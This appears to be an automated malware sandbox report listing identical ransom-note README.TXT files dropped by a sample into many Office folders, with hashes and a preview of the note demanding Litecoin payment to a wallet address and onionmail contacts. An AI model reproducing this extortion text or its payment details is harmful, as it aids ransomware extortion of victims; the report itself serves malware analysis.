                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office15\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-inv16\Cartridges\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\Document Parts\1033\16\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\LivePersonaCardRollback\images\default\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\LivePersonaCard\images\default\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\TextInputIntelligence\en-us\prefilter\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000002\OfflineFiles\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000006\OfflineFiles\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000011\OfflineFiles\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000018\assets\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000043\win32\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000050\OfflineFiles\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
